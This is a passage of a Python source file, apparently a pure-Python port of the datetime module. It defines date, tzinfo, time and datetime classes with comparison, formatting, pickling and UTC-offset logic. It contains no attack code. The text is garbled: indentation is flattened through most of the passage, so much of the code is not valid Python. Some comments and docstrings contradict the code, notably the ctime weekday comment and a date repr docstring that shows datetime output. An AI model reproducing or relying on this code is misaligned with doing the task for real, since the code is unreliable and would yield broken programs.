        return cls.fromtimestamp(t)

    @classmethod
    def fromordinal(cls, n):
        """Construct a date from a proleptic Gregorian ordinal.

        January 1 of year 1 is day 1.  Only the year, month and day are
        non-zero in the result.
        """
        y, m, d = _ord2ymd(n)
        return cls(y, m, d)
    # Conversions to string

    def __repr__(self):
        """Convert to formal string, for repr().

        >>> dt = datetime(2010, 1, 1)
        >>> repr(dt)
        'datetime.datetime(2010, 1, 1, 0, 0)'

        >>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
        >>> repr(dt)
        'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
        """
        # The "datetime." prefix appears only for this class itself, not
        # for subclasses.
        module = "datetime." if self.__class__ is date else ""
        return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
                                   self._year,
                                   self._month,
                                   self._day)

    # XXX These shouldn't depend on time.localtime(), because that
    # clips the usable dates to [1970 .. 2038).  At least ctime() is
    # easily done without using strftime() -- that's better too because
    # strftime("%c", ...) is locale specific.

    def ctime(self):
        "Return ctime() style string."
        # toordinal() % 7 yields 1..6 for Tue..Sun; `or 7` maps the 0 case
        # (Sunday... actually Monday-origin wrap) into _DAYNAMES' 1..7 range.
        weekday = self.toordinal() % 7 or 7
        return "%s %s %2d 00:00:00 %04d" % (
            _DAYNAMES[weekday],
            _MONTHNAMES[self._month],
            self._day, self._year)

    # def strftime(self, format):
    #     "Format using strftime()."
    #     return _wrap_strftime(self, format, self.timetuple())
    def __format__(self, fmt):
        # format(d, "") falls back to str(); any non-empty spec is handed
        # to self.strftime.  NOTE(review): strftime is commented out above
        # -- confirm a strftime is provided elsewhere, or a non-empty
        # format spec will raise AttributeError.
        if not isinstance(fmt, (str, unicode)):
            raise ValueError("__format__ expects str or unicode, not %s" %
                             fmt.__class__.__name__)
        if len(fmt) != 0:
            return self.strftime(fmt)
        return str(self)

    def isoformat(self):
        """Return the date formatted according to ISO.

        This is 'YYYY-MM-DD'.

        References:
        - http://www.w3.org/TR/NOTE-datetime
        - http://www.cl.cam.ac.uk/~mgk25/iso-time.html
        """
        # zfill is used instead of %0Nd formatting below, presumably for
        # the benefit of the restricted runtime this module targets.
        # return "%04d-%02d-%02d" % (self._year, self._month, self._day)
        return "%s-%s-%s" % (str(self._year).zfill(4), str(self._month).zfill(2), str(self._day).zfill(2))

    __str__ = isoformat
    # Read-only field accessors: expose the slots assigned in __new__.

    @property
    def year(self):
        """year (1-9999)"""
        return self._year

    @property
    def month(self):
        """month (1-12)"""
        return self._month

    @property
    def day(self):
        """day (1-31)"""
        return self._day
# Standard conversions, __cmp__, __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
# A date carries no time of day: hour/minute/second are 0 and the
# DST flag is -1 (unknown).
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
    """Return a new date with new values for the specified fields.

    Omitted fields default to this date's current values.
    """
    # __new__ re-validates the fields; type(self) keeps subclasses intact.
    return date.__new__(type(self),
                        self._year if year is None else year,
                        self._month if month is None else month,
                        self._day if day is None else day)
# Comparisons of date objects with other.
# An operand exposing timetuple() (a date-like type) gets a chance to
# implement the reflected comparison, hence NotImplemented; any other
# type is simply unequal (==/!=) or a TypeError (ordering).
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, date):
return self._cmp(other) != 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
# Internal three-way compare (-1/0/1); caller guarantees 'other' is a date.
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
# Hash the packed pickle state; cached since dates are immutable
# (-1 marks "not computed yet").
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
# Computations
def _add_timedelta(self, other, factor):
# Shared helper for __add__/__sub__; factor is +1 or -1.
# _normalize_date carries day overflow into month/year and range-checks.
y, m, d = _normalize_date(
self._year,
self._month,
self._day + other.days * factor)
return date(y, m, d)
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
return self._add_timedelta(other, 1)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta._create(days1 - days2, 0, 0, False)
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
def weekday(self):
    "Return day of the week, where Monday == 0 ... Sunday == 6."
    # Ordinal 1 (1-Jan-0001) was a Monday, hence the +6 rotation.
    ordinal = self.toordinal()
    return (ordinal + 6) % 7

# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
    "Return day of the week, where Monday == 1 ... Sunday == 7."
    # 1-Jan-0001 is a Monday, so ordinal % 7 is 1..6 for Mon..Sat
    # and 0 for Sunday, which must be reported as 7.
    dow = self.toordinal() % 7
    return dow if dow else 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
# Before week 1: the date belongs to the last ISO week of the
# previous year -- recompute against that year's week 1.
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
# A 53rd week may actually be week 1 of the following ISO year.
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
# Pickle payload: the year split into two bytes, then month and day.
yhi, ylo = divmod(self._year, 256)
return (_struct.pack('4B', yhi, ylo, self._month, self._day),)
def __setstate(self, string):
# Inverse of _getstate: unpack the 4-byte string (no validation).
yhi, ylo, self._month, self._day = (ord(string[0]), ord(string[1]),
ord(string[2]), ord(string[3]))
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
# Extreme representable values and smallest difference, attached after
# the class body exists.
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo(object):
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
# delta is the standard offset: shift into this zone's standard time.
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
if dtdst:
return dt + dtdst
else:
return dt
# Pickle support.
def __reduce__(self):
# Honor __getinitargs__/__getstate__ when the subclass provides
# them; otherwise fall back to the instance __dict__ (if any).
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time(object):
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
# NOTE(review): the byte-string pickle fast path present in CPython's
# pure-Python datetime is disabled in this port.
# if isinstance(hour, bytes) and len(hour) == 6 and ord(hour[0]) < 24:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(hour, minute or None)
# self._hashcode = -1
# return self
# _check_time_fields range-checks and coerces the field values.
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
# -1 marks the cached hash as not yet computed.
self._hashcode = -1
return self
# Read-only field accessors
# time objects are immutable: accessors are read-only properties.
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
# Unlike date, time comparisons never return NotImplemented here:
# a non-time operand is simply unequal (==/!=) or an error (ordering).
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, time):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
# Three-way compare. Identical tzinfo objects (or equal UTC offsets)
# allow a plain field-by-field comparison; otherwise compare with the
# offsets (in minutes) folded into hour/minute.
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self._utcoffset()
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware times")
myhhmm = self._hour * 60 + self._minute - myoff
othhmm = other._hour * 60 + other._minute - otoff
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
# Cached (immutable object). An aware time hashes like its
# UTC-normalized equivalent so equal times hash equally; if the
# normalized hour falls outside 0..23 we hash the raw tuple instead.
if self._hashcode == -1:
tzoff = self._utcoffset()
if not tzoff: # zero or None
self._hashcode = hash(self._getstate()[0])
else:
h, m = divmod(self.hour * 60 + self.minute - tzoff, 60)
if 0 <= h < 24:
self._hashcode = hash(time(h, m, self.second, self.microsecond))
else:
self._hashcode = hash((h, m, self.second, self.microsecond))
return self._hashcode
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
# Trailing zero fields (microsecond, then second) are omitted.
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
# Only the base class gets the "datetime." module prefix.
module = "datetime." if self.__class__ is time else ""
s= "%s(%d, %d%s)" % (module + self.__class__.__name__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
# Append the "+HH:MM"/"-HH:MM" offset only for aware times.
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
# def strftime(self, format):
# """Format using strftime(). The date part of the timestamp passed
# to underlying strftime should not be used.
# """
# # The year must be >= _MINYEARFMT else Python's strftime implementation
# # can raise a bogus exception.
# timetuple = (1900, 1, 1,
# self._hour, self._minute, self._second,
# 0, 1, -1)
# return _wrap_strftime(self, format, timetuple)
def __format__(self, fmt):
# format(t, spec): empty spec -> str(self), otherwise strftime().
# NOTE(review): strftime() is commented out in this port, so a
# non-empty fmt would raise AttributeError -- confirm intent.
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
# Public variant: wraps the validated minute count in a timedelta.
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
            tzinfo=True):
    """Return a new time with new values for the specified fields.

    tzinfo uses True as its "not given" sentinel so that an explicit
    tzinfo=None can strip the zone.
    """
    # __new__ re-validates the fields; type(self) keeps subclasses intact.
    return time.__new__(
        type(self),
        self.hour if hour is None else hour,
        self.minute if minute is None else minute,
        self.second if second is None else second,
        self.microsecond if microsecond is None else microsecond,
        self.tzinfo if tzinfo is True else tzinfo)
def __nonzero__(self):
# Python 2 truth protocol: a time is false only when it equals
# midnight after folding in its UTC offset.
if self.second or self.microsecond:
return True
offset = self._utcoffset() or 0
return self.hour * 60 + self.minute != offset
# Pickle support.
def _getstate(self):
# Pickle payload: 6 bytes (hour, minute, second, 3-byte microsecond),
# plus the tzinfo object when aware.
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('6B', self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
# Inverse of _getstate: unpack the 6-byte string and reattach tzinfo.
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
self._hour, self._minute, self._second, us1, us2, us3 = (
ord(string[0]), ord(string[1]), ord(string[2]),
ord(string[3]), ord(string[4]), ord(string[5]))
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
# Extreme representable values and smallest difference, attached after
# the class body exists.
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints or longs.
"""
__slots__ = date.__slots__ + time.__slots__
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
# NOTE(review): the byte-string pickle fast path present in CPython's
# pure-Python datetime is disabled in this port.
# if isinstance(year, bytes) and len(year) == 10 and \
# 1 <= ord(year[2]) <= 12:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(year, month)
# self._hashcode = -1
# return self
# The _check_* helpers range-check and coerce every field.
year, month, day = _check_date_fields(year, month, day)
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
# -1 marks the cached hash as not yet computed.
self._hashcode = -1
return self
# Read-only field accessors
# datetime objects are immutable: accessors are read-only properties
# (year/month/day are inherited from date).
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def fromtimestamp(cls, timestamp, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
# Naive result uses local time; aware result is built in UTC and
# then mapped into tz via fromutc().
converter = _time.localtime if tz is None else _time.gmtime
self = cls._from_timestamp(converter, timestamp, tz)
if tz is not None:
self = tz.fromutc(self)
return self
@classmethod
def utcfromtimestamp(cls, t):
"Construct a UTC datetime from a POSIX timestamp (like time.time())."
return cls._from_timestamp(_time.gmtime, t, None)
@classmethod
def _from_timestamp(cls, converter, timestamp, tzinfo):
# Split the timestamp into whole seconds and rounded microseconds.
t_full = timestamp
timestamp = int(_math.floor(timestamp))
frac = t_full - timestamp
us = _round(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
timestamp += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = converter(timestamp)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us, tzinfo)
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
# The _date_class/_time_class aliases exist because the parameters
# shadow the module-level date and time names here.
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
# DST flag: -1 unknown (naive), 0 not in effect, 1 in effect.
dst = self._dst()
if dst is None:
dst = -1
elif dst:
dst = 1
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
offset = self._utcoffset()
if offset: # neither None nor 0
# Subtract the offset (in minutes) and renormalize; overflow past
# MINYEAR/MAXYEAR is deliberately ignored here.
mm -= offset
y, m, d, hh, mm, ss, _ = _normalize_datetime(
y, m, d, hh, mm, ss, 0, ignore_overflow=True)
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
    "Return the date part."
    # _date_class is the module-level alias for the date class.
    return _date_class(self._year, self._month, self._day)
def time(self):
    "Return the time part, with tzinfo None."
    return _time_class(self.hour, self.minute, self.second,
                       self.microsecond)
def timetz(self):
    "Return the time part, with same tzinfo."
    return _time_class(self.hour, self.minute, self.second,
                       self.microsecond, self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
            minute=None, second=None, microsecond=None, tzinfo=True):
    """Return a new datetime with new values for the specified fields.

    tzinfo uses True as its "not given" sentinel so that an explicit
    tzinfo=None can strip the zone.
    """
    # __new__ re-validates the fields; type(self) keeps subclasses intact.
    return datetime.__new__(
        type(self),
        self.year if year is None else year,
        self.month if month is None else month,
        self.day if day is None else day,
        self.hour if hour is None else hour,
        self.minute if minute is None else minute,
        self.second if second is None else second,
        self.microsecond if microsecond is None else microsecond,
        self.tzinfo if tzinfo is True else tzinfo)
def astimezone(self, tz):
# Convert an aware datetime to an equivalent one in zone tz.
if not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string, e.g. 'Fri Jan  1 12:34:56 2010'."
# toordinal() % 7 or 7 maps the day to the 1-based _DAYNAMES index.
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
# Append the signed "+HH:MM"/"-HH:MM" offset only for aware datetimes.
off = self._utcoffset()
if off is not None:
if off < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, 60)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
# Drop trailing zero microsecond, then trailing zero second, so the
# repr is as short as possible while still round-tripping.
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = ", ".join(map(str, L))
# Only the base class gets the "datetime." module prefix.
module = "datetime." if self.__class__ is datetime else ""
s = "%s(%s)" % (module + self.__class__.__name__, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
# @classmethod
# def strptime(cls, date_string, format):
# 'string, format -> new datetime parsed from a string (like time.strptime()).'
# from _strptime import _strptime
# # _strptime._strptime returns a two-element tuple. The first
# # element is a time.struct_time object. The second is the
# # microseconds (which are not defined for time.struct_time).
# struct, micros = _strptime(date_string, format)
# return cls(*(struct[0:6] + (micros,)))
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
# Public variant: wraps the validated minute count in a timedelta.
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
offset = _check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
# A plain date (isinstance(other, date) but not datetime) falls through
# to the else branch: unequal for ==/!=, TypeError for ordering. Other
# timetuple()-bearing types get NotImplemented so they can implement
# the reflected comparison.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other) == 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, datetime):
return self._cmp(other) != 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif hasattr(other, "timetuple") and not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
# Three-way compare. Identical tzinfo objects (or equal UTC offsets)
# allow a plain field-by-field comparison; otherwise subtract and
# inspect the sign of the resulting timedelta.
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
if mytz is not None:
myoff = self._utcoffset()
if ottz is not None:
otoff = other._utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
raise TypeError("can't compare offset-naive and offset-aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def _add_timedelta(self, other, factor):
# Shared helper for __add__/__sub__; factor is +1 or -1. Overflowing
# fields are carried upward by _normalize_datetime.
y, m, d, hh, mm, ss, us = _normalize_datetime(
self._year,
self._month,
self._day + other.days * factor,
self._hour,
self._minute,
self._second + other.seconds * factor,
self._microsecond + other.microseconds * factor)
return datetime(y, m, d, hh, mm, ss, us, tzinfo=self._tzinfo)
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
return self._add_timedelta(other, 1)
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
# Field-wise naive difference first...
delta_d = self.toordinal() - other.toordinal()
delta_s = (self._hour - other._hour) * 3600 + \
(self._minute - other._minute) * 60 + \
(self._second - other._second)
delta_us = self._microsecond - other._microsecond
base = timedelta._create(delta_d, delta_s, delta_us, True)
if self._tzinfo is other._tzinfo:
return base
# ...then correct by the offset difference for aware operands.
myoff = self._utcoffset()
otoff = other._utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("can't subtract offset-naive and offset-aware datetimes")
return base + timedelta(minutes = otoff-myoff)
def __hash__(self):
# Cached (immutable object). Aware datetimes hash by their UTC
# equivalent (offset folded into the minutes) so equal instants
# hash equally.
if self._hashcode == -1:
tzoff = self._utcoffset()
if tzoff is None:
self._hashcode = hash(self._getstate()[0])
else:
days = _ymd2ord(self.year, self.month, self.day)
